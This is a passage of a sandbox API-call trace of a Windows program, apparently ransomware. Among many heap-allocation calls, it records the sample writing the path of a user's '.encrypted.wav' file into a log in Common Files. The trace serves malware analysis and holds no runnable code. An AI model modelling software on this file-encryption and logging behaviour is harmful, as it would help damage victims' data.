lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.085] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.085] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.085] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.086] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.086] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.086] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.086] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.086] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.086] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.086] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.086] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.086] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x699, lpOverlapped=0x0) returned 1 [0031.087] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.087] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x699, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.087] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.encrypted.wav\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0031.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x55) returned 0x794b90 [0031.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.encrypted.wav\r\n", cchWideChar=85, lpMultiByteStr=0x794b90, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 85 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0031.087] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x54, lpOverlapped=0x0) returned 1 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0031.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.087] CloseHandle (hObject=0x140) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.090] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.091] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.093] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: 